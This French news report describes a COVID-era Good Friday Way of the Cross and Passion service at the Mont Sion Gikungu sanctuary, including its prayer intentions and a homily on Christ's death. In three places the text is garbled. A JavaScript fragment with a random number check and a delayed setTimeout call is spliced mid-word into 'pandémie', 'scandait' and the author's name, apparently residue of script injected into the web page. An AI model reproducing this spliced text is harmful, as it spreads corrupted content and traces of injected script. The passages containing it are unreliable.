Il était devenu une habitude depuis un certain nombre d’années que le chemin de croix du Vendredi Saint prenne un itinéraire qui va en dehors des enceintes du Sanctuaire de la Reine de la Paix et la Réconciliation de Mont Sion Gikungu. Mais  ce Vendredi Saint fait une exception. C’est suite à la menace de la contagion et de la propagation de la pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andémie de coronavirus et du respect des mesures de précaution y relatives que le Sanctuaire a jugé bon de ne pas prendre un itinéraire en dehors de ses enceintes. Le chemin de croix a débuté à 15h30, heure locale, pour durer une heure et demie de temps. Il a été dirigé par la Père Recteur du Sanctuaire. C’était une prière de recueillement méditatif et dont des passages bibliques, l’Ancien comme le Nouveau Testament, constituaient  des références essentielles de la prière.

Quatorze personnes  avaient été choisies pour représenter tous les autres fidèles en adressant des prières au Seigneur à chaque station. On a prié pour plusieurs catégories de personnes dont entre autres les prisonniers  afin qu’elles recouvrent leur liberté et tous ceux qui sont confinés chez eux par d’éviter la propagation du coronavirus. On a également prié pour les personnes qui ont des difficultés de diverses manières dans leurs familles, dans leurs communautés et même au travail. Le souhait était que le poids de leur fardeau ne continue plus à peser sur elles, mais plutôt qu’elles retrouvent la joie et la liberté de Pâques. Les jeunes gens alcooliques et consommateurs de drogues n’ont pas été oubliés au cours dudit chemin de croix, tout comme les réfugiés à cause des guerres ainsi personnes séparées à cause du covid 19. L’on a aussi imploré au Seigneur d’accorder aux riches un esprit de partage avec les plus démunis, comme enfants de la rue, les veuves, les femmes délassées par leurs maris et les hommes désertés par leurs femmes. Une prière pour la conversion des criminelles et tortionnaires a également été adressée à Jésus.

Nous faisons savoir que juste après le chemin de croix il y a eu le la célébration de la Passion du Seigneur. Celle-ci a été dirigée par le Père Longin Ntiranyibagira. Dans son enseignement d’après la lecture de la Passion du Seigneur, le Père  Ntiranyibagira est parti de la dernière  phrase de Jésus avant de pousser son dernier souffle, ” Tout est accompli”. Toutes les catégories de personnes ont assisté à la mort de Jésus et y ont mis leur main: les hautes autorités politiques, les magistrats et avocats, les militaires et commerçants, les prêtres et même une foule immense de gens qui scandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andait sans cesse des slogans pleins de haine contre Jésus tout en exigeant à Pilate de le faire crucifier.

Mais c’est grâce à sa mort que nous avons eu le salut pour nos péchés. Ceci est d’autant plus vrai que Jésus est le seul médiateur entre Dieu et son Peuple que nous sommes. Si Jésus n’avait pas souffert sa Passion, nous aurions à subir le supplice qu’il a lui-même subi pour la rémission de nos péchés: couronne d’épine sur la tête, innombrables couts de fouet, crachats sur le visage, injures de la part de tout le monde, jugement injuste et injustifiable des autorités et magistrats du pays, être dénudé avant d’être enfin pendu sur la croix et mourir en ces conditions. Nous sommes finalement heureux grâce à la croix du Christ car nous y avons reçu beaucoup d’avantages: médiation sûre et rapide  entre nous et Dieu, rémission de nos péchés et une Mère, Marie qui prie et intercède sans cesse pour nous.

Itangivyiza Kim et Méthodre Nyandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andwi